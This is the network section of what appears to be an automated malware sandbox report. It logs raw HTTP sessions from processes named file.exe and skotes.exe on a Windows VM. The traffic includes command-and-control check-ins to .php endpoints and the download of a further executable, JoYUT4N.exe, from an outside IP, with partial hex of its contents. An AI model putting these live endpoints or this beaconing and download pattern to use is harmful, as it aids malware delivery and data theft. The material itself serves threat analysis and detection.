Dec 7, 2024 10:52:01.000333071 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 7, 2024 10:52:01.000382900 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 7, 2024 10:52:01.000432968 CET	1236	IN	Data Raw: 61 b1 e8 0c 5a cc f0 ea 98 f8 31 7c 92 30 ca 9c 8a dc a1 04 a5 71 ac 0c fa 71 55 62 85 7a 95 84 c1 9c e8 0c 5a ec ef ea 98 f8 d1 82 92 30 ca fc 8a dc a1 04 85 71 ac 0c fa 71 55 62 85 7a ad 84 b1 9c e8 0c 5a fc f3 ea 98 f8 f1 82 92 30 ca dc 8a dc Data Ascii: aZ1\|0qqUbzZ0qqUbzZ0eqqUbzZ0<EqqUbzZl0%qqUbzMZTQ0\|qqUbz=Z q0\qqUbziZ0
Dec 7, 2024 10:52:01.000444889 CET	1236	IN	Data Raw: e5 75 ac 0c fa 71 55 62 85 7a ad 84 05 9e e8 0c 5a c4 f0 ea 98 f8 11 87 92 30 ca bc 80 dc a1 04 c5 75 ac 0c fa 71 55 62 85 7a ad 84 fd 9e e8 0c 5a 40 f8 ea 98 f8 31 87 92 30 ca 9c 79 dc a1 04 a5 76 ac 0c fa 71 55 62 85 7a a9 84 f5 9e e8 0c 5a 6c Data Ascii: uqUbzZ0uqUbzZ@10yvqUbzZl0yvqUbz)Z0yevqUbz!Z0<zEvqUbzZ,0{%vqUbzIZDQ0\|{vqUbzAZ
Dec 7, 2024 10:52:01.000457048 CET	1236	IN	Data Raw: 98 f8 51 8a 92 30 ca 7c af dc a1 04 05 6a ac 0c fa 71 55 62 85 7a e1 84 e1 97 e8 0c 5a 34 f4 ea 98 f8 71 8a 92 30 ca 5c af dc a1 04 e5 6a ac 0c fa 71 55 62 85 7a d1 84 19 97 e8 0c 5a 10 f8 ea 98 f8 11 8a 92 30 ca bc af dc a1 04 c5 6a ac 0c fa 71 Data Ascii: Q0\|jqUbzZ4q0\jqUbzZ0jqUbzZ10gqUbzqZ0gqUbzZ0egqUbzZ0<EgqUbzZ0%gqU
Dec 7, 2024 10:52:01.000647068 CET	1236	IN	Data Raw: 85 7a ab 84 5d 9b e7 0c b1 75 08 0f 99 78 01 14 0e 30 4a 96 5e 2f a2 a7 8d 24 6b 62 85 64 55 62 85 7a 95 04 9d 42 ac 0c 31 40 b7 e9 98 97 a1 a5 d1 1c 0b ae 4e de a1 04 05 6b ac 0c 14 5c a9 67 85 78 d1 13 0e 30 4a ea 5d 2f a2 f5 53 64 55 62 85 78 Data Ascii: z]ux0J^/$kbdUbzB1@Nk\gx0J]/SdUbx0J]/Sx0J/=/c0J2^/Sz}x{0J*^/$kW-.}nWHx0Jn]/SgA0Jn/(Z}n(v}n20GTIl0g)x
Dec 7, 2024 10:52:01.000668049 CET	1236	IN	Data Raw: ba 21 ab 0c 4c e3 a5 a8 8d 18 67 24 19 1e ed 0c 4c 5e fe 61 f7 f8 ec 46 92 30 13 0b f7 72 ad 0c 8d 64 55 62 85 64 55 62 85 64 55 62 85 8b 16 02 00 99 bc 1c 00 70 10 e4 94 e0 6a 24 45 1b ed 0c 2f 25 58 0e 4c db a9 a7 51 1c d2 04 86 22 ab 0c 14 5c Data Ascii: !Lg$L^aF0rdUbdUbdUbpj$E/%XLQ"\cgrdUbdUbdUbM JRk&dUbdUbdUbM$)JR`dUbdUbdUbM/%58&5 L(<rpk&dUbM
Dec 7, 2024 10:52:01.000679016 CET	1236	IN	Data Raw: 85 64 55 62 85 64 55 62 85 8b 16 02 03 99 e8 20 ff 99 38 26 00 e0 14 9b 95 f8 d3 b4 92 30 13 5e 90 de 91 0c 99 30 a2 9f 8b 5d e7 38 c8 30 a2 0c 14 5c ad 6a cf 30 15 97 92 9a ac cd 14 70 38 17 ed 65 dc de 4b 66 49 1c ff 2f a2 eb 4b 5e bf 9f ae 93 Data Ascii: dUbdUb 8&0^0]80\j0p8eKfI/K^k&dUbzvm&L^R`x0LDm"NpUa'qUbdUbdUbMQSI?/`dUbdUbdUb[h/,X]
Dec 7, 2024 10:52:01.120234013 CET	1236	IN	Data Raw: d2 1c a2 0c 99 30 2b 8c d5 30 3d 2b 4a e6 e5 ff cf 99 e7 cc 49 d8 ad a5 07 f0 6a eb 9c 2f a2 0c 99 35 38 fe a9 83 1a 0f 99 b1 6d 2a 4e 70 92 a9 5e 30 a2 0c 90 db a5 0c 99 35 a2 a9 7c 25 2e a2 91 30 a2 04 df 9d ac 0c 4c 00 10 ed d0 99 4f d9 58 00 Data Ascii: 0+0=+JIj/58mNp^05\|%.0LOX=a5$Z1g?%6:0+ja+^j20+ja (0mNp855M8%L],0HRIB/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49869	185.215.113.206	80	7484	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Dec 7, 2024 10:52:06.654356003 CET	474	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAKKKFBFIDGDBFHJJEHI Host: 185.215.113.206 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 41 4b 4b 4b 46 42 46 49 44 47 44 42 46 48 4a 4a 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 64 33 36 38 62 32 61 61 62 61 34 63 39 39 63 37 36 63 63 30 64 36 66 30 32 36 37 66 36 31 34 66 30 32 32 32 37 65 37 35 64 31 30 65 31 64 61 61 65 37 39 38 36 32 66 61 30 61 62 38 65 61 35 61 65 32 37 34 61 66 35 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 4b 4b 46 42 46 49 44 47 44 42 46 48 4a 4a 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 4b 4b 46 42 46 49 44 47 44 42 46 48 4a 4a 45 48 49 2d 2d 0d 0a Data Ascii: ------CAKKKFBFIDGDBFHJJEHIContent-Disposition: form-data; name="token"4d368b2aaba4c99c76cc0d6f0267f614f02227e75d10e1daae79862fa0ab8ea5ae274af5------CAKKKFBFIDGDBFHJJEHIContent-Disposition: form-data; name="message"wkkjqaiaxkhb------CAKKKFBFIDGDBFHJJEHI--
Dec 7, 2024 10:52:08.491431952 CET	203	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:52:07 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	50004	185.215.113.43	80	8624	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 7, 2024 10:53:05.424204111 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 7, 2024 10:53:06.761780024 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 07 Dec 2024 09:53:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	50010	185.215.113.43	80	8624	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 7, 2024 10:53:08.431605101 CET	314	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 30 32 39 37 39 42 30 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B02979B05C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Dec 7, 2024 10:53:09.793414116 CET	668	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 07 Dec 2024 09:53:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 64 64 0d 0a 20 3c 63 3e 31 30 31 32 39 31 31 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 39 63 32 36 63 62 31 34 31 39 65 64 30 30 62 64 31 34 31 33 30 33 37 66 39 37 65 35 64 31 32 63 65 36 38 33 39 61 35 35 33 36 65 36 23 31 30 31 32 39 32 30 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 65 37 65 37 62 39 63 61 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 31 32 39 32 31 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 66 38 65 36 62 31 63 61 37 32 64 64 35 33 34 64 62 30 35 37 65 62 34 31 30 61 34 39 34 64 39 64 23 31 30 31 32 39 32 32 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 [TRUNCATED] Data Ascii: 1dd <c>1012911001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fb9c26cb1419ed00bd1413037f97e5d12ce6839a5536e6#1012920001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e7e7b9ca30804042ba5ce902415450#1012921001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb410a494d9d#1012922001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8fcf7b8c730804042ba5ce902415450#1012923001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e4f4b2846d934f48b15eaa495c49#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	50013	31.41.244.11	80	8624	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 7, 2024 10:53:09.918401957 CET	66	OUT	GET /files/7995533987/JoYUT4N.exe HTTP/1.1 Host: 31.41.244.11
Dec 7, 2024 10:53:11.243908882 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 07 Dec 2024 09:53:11 GMT Content-Type: application/octet-stream Content-Length: 503040 Last-Modified: Sat, 07 Dec 2024 08:54:32 GMT Connection: keep-alive ETag: "67540d48-7ad00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 35 b3 bf f5 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 54 07 00 00 2e 00 00 00 00 00 00 ee 72 07 00 00 20 00 00 00 80 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 07 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 72 07 00 53 00 00 00 00 80 07 00 f6 2b 00 00 00 00 00 00 00 00 00 00 00 84 07 00 00 29 00 00 00 c0 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL5"0T.r @ @rS+) H.textR T `.rsrc+,V@@.reloc@BrH1f4ffffT$T$f2W1fWffffT$T$fW(V(Z([?%(%(2?%(m%(n.(o{"}{"}{"}.s.sO^{{{(3^{{ {(3.sX!o2((oo3(oo(#
Dec 7, 2024 10:53:11.243963957 CET	224	IN	Data Raw: 62 28 85 00 00 06 73 12 00 00 0a 28 13 00 00 0a 6f 31 00 00 0a 16 fe 01 2a 62 28 86 00 00 06 73 12 00 00 0a 28 13 00 00 0a 6f 31 00 00 0a 16 fe 01 2a 00 13 30 01 00 06 00 00 00 21 00 00 11 72 f5 02 00 70 2a 00 00 13 30 01 00 06 00 00 00 21 00 00 Data Ascii: b(s(o1b(s(o10!rp0!rp0!rp0!rp0!rp0!r!p0!rUp0!rp0!r
Dec 7, 2024 10:53:11.243980885 CET	1236	IN	Data Raw: bd 05 00 70 2a 00 00 13 30 01 00 06 00 00 00 21 00 00 11 72 f1 05 00 70 2a 00 00 13 30 01 00 06 00 00 00 21 00 00 11 72 25 06 00 70 2a 00 00 13 30 01 00 06 00 00 00 21 00 00 11 72 59 06 00 70 2a 00 00 13 30 01 00 06 00 00 00 21 00 00 11 72 8d 06 Data Ascii: p0!rp0!r%p0!rYp0!rp0!rp0!rp0!r)p0!r]p0!rp0!rp0!rp0!r
Dec 7, 2024 10:53:11.244043112 CET	224	IN	Data Raw: 00 00 11 72 6f 04 00 70 2a 00 00 13 30 01 00 06 00 00 00 21 00 00 11 72 7f 04 00 70 2a 00 00 13 30 01 00 06 00 00 00 21 00 00 11 72 8f 04 00 70 2a 00 00 13 30 01 00 06 00 00 00 21 00 00 11 72 9d 04 00 70 2a 00 00 13 30 01 00 06 00 00 00 21 00 00 Data Ascii: rop0!rp0!rp0!rp0!rp0!rp0!r8p0!rRp0!rXp0!rZp0!rzp*0!r
Dec 7, 2024 10:53:11.244060040 CET	1236	IN	Data Raw: 86 17 00 70 2a 00 00 13 30 01 00 06 00 00 00 21 00 00 11 72 90 17 00 70 2a 00 00 13 30 01 00 06 00 00 00 21 00 00 11 72 b0 17 00 70 2a 00 00 13 30 01 00 06 00 00 00 21 00 00 11 72 c8 17 00 70 2a 00 00 13 30 01 00 06 00 00 00 21 00 00 11 72 f4 17 Data Ascii: p0!rp0!rp0!rp0!rp0!rp0!r$p0!rDp0!rVp0!rhp0!rvp0!rp0!r
Dec 7, 2024 10:53:11.244077921 CET	1236	IN	Data Raw: 00 00 11 72 00 1e 00 70 2a 00 00 13 30 01 00 06 00 00 00 21 00 00 11 72 0e 1e 00 70 2a 00 00 13 30 01 00 06 00 00 00 21 00 00 11 72 18 1e 00 70 2a 00 00 13 30 01 00 06 00 00 00 21 00 00 11 72 28 1e 00 70 2a 00 00 13 30 01 00 06 00 00 00 21 00 00 Data Ascii: rp0!rp0!rp0!r(p0!r4p0!r>p0!rFp0!rxp0!rp0!rp0!rp0!rp0!
Dec 7, 2024 10:53:11.244096994 CET	1236	IN	Data Raw: fe 01 2c 02 2b 02 2b d6 73 a9 00 00 0a fe 0e 00 00 fe 09 00 00 20 01 00 00 00 8d 3f 00 00 01 25 20 00 00 00 00 28 70 00 00 06 a2 20 01 00 00 00 6f 48 00 00 0a 7e 22 00 00 04 25 2d 17 26 7e 21 00 00 04 fe 06 59 00 00 06 73 aa 00 00 0a 25 80 22 00 Data Ascii: ,++s ?% (p oH~"%-&~!Ys%"(+(+o8( O% = oi 3R o o O% "o
Dec 7, 2024 10:53:11.244189024 CET	1236	IN	Data Raw: 28 87 00 00 06 28 33 00 00 0a 2c 13 28 34 00 00 0a 28 88 00 00 06 6f 30 00 00 0a 2c 02 17 2a 28 32 00 00 0a 28 89 00 00 06 28 33 00 00 0a 2c 13 28 34 00 00 0a 28 8a 00 00 06 6f 30 00 00 0a 2c 02 17 2a 16 2a 00 00 13 30 04 00 d0 00 00 00 05 00 00 Data Ascii: ((3,(4(o0,(2((3,(4(o0,0 +L ,(((-4 , ,++~(~((ij(5 @(&
Dec 7, 2024 10:53:11.244205952 CET	896	IN	Data Raw: 04 a2 25 20 01 00 00 00 28 98 00 00 06 a2 25 20 02 00 00 00 28 99 00 00 06 28 3b 00 00 06 a2 25 20 03 00 00 00 28 9a 00 00 06 a2 25 20 04 00 00 00 28 9b 00 00 06 28 39 00 00 06 a2 25 20 05 00 00 00 28 9c 00 00 06 a2 25 20 06 00 00 00 28 9d 00 00 Data Ascii: % (% ((;% (% ((9% (% ((;% (% (9(FoQ B(.(R&(S B(.* ,d((2((J
Dec 7, 2024 10:53:11.244225979 CET	1236	IN	Data Raw: b1 00 00 06 a2 25 20 10 00 00 00 28 b2 00 00 06 28 3b 00 00 06 a2 25 20 11 00 00 00 28 b3 00 00 06 a2 25 20 12 00 00 00 7e 04 00 00 04 28 39 00 00 06 a2 25 20 13 00 00 00 28 b4 00 00 06 a2 25 20 14 00 00 00 28 b5 00 00 06 28 3b 00 00 06 a2 25 20 Data Ascii: % ((;% (% ~(9% (% ((;% (% ~(9% (% ((;% (% (,(9% (% ((;% (% (-(Xo/(9
Dec 7, 2024 10:53:11.364084005 CET	1236	IN	Data Raw: 2b 28 00 fe 0c 01 00 20 00 00 00 00 fe 01 2c 0a 00 20 01 00 00 00 fe 0e 01 00 00 fe 0c 01 00 20 01 00 00 00 fe 01 2c 02 2b 02 2b d6 20 09 00 00 00 8d 3f 00 00 01 25 20 00 00 00 00 28 c4 00 00 06 28 c5 00 00 06 28 21 00 00 06 a2 25 20 01 00 00 00 Data Ascii: +( , ,++ ?% (((!% (((!% (((!% (((!% (((!% (((!% (((!% (+% ((i

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	50014	185.215.113.43	80	8624	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 7, 2024 10:53:14.773948908 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 32 39 31 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1012911001&unit=246122658369
Dec 7, 2024 10:53:16.137005091 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 07 Dec 2024 09:53:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

HTTPS Connections

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Dec 7, 2024 10:53:09.138381958 CET	13.107.246.63	443	192.168.2.6	49996	CN=*.azureedge.net, O=Microsoft Corporation, L=Redmond, ST=WA, C=US CN=Microsoft Azure RSA TLS Issuing CA 04, O=Microsoft Corporation, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=Microsoft Azure RSA TLS Issuing CA 04, O=Microsoft Corporation, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 19 17:30:52 CEST 2024 Thu Jun 08 02:00:00 CEST 2023 Thu Aug 01 14:00:00 CEST 2013	Sun Sep 14 17:30:52 CEST 2025 Wed Aug 26 01:59:59 CEST 2026 Fri Jan 15 13:00:00 CET 2038	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-16-23-65281,29-23-24,0	28a2c9bd18a11de089ef85a160da29e4
					CN=Microsoft Azure RSA TLS Issuing CA 04, O=Microsoft Corporation, C=US	CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Jun 08 02:00:00 CEST 2023	Wed Aug 26 01:59:59 CEST 2026
					CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Aug 01 14:00:00 CEST 2013	Fri Jan 15 13:00:00 CET 2038

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.6	49708	40.126.53.13	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:06 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 4831 Host: login.live.com
2024-12-07 09:51:06 UTC	4831	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-12-07 09:51:07 UTC	569	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Sat, 07 Dec 2024 09:50:06 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C558_BL2 x-ms-request-id: 9554f14d-b760-4056-bdfb-13e99656797c PPServer: PPV: 30 H: BL02EPF0001DA30 V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Sat, 07 Dec 2024 09:51:06 GMT Connection: close Content-Length: 11197
2024-12-07 09:51:07 UTC	11197	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.2.6	49710	20.199.58.43	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:07 UTC	2587	OUT	GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338389&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241207T095054Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=3290b30b54024f419717281bf466c3e2&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=617972&metered=false&nettype=ethernet&npid=sc-338389&oemName=VMware%2C%20Inc.&oemid=Public&ossku=Professional&scmid=Public&smBiosDm=VMware20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=617972&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waas [TRUNCATED] Accept-Encoding: gzip, deflate X-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6 X-SDK-HW-TOKEN: 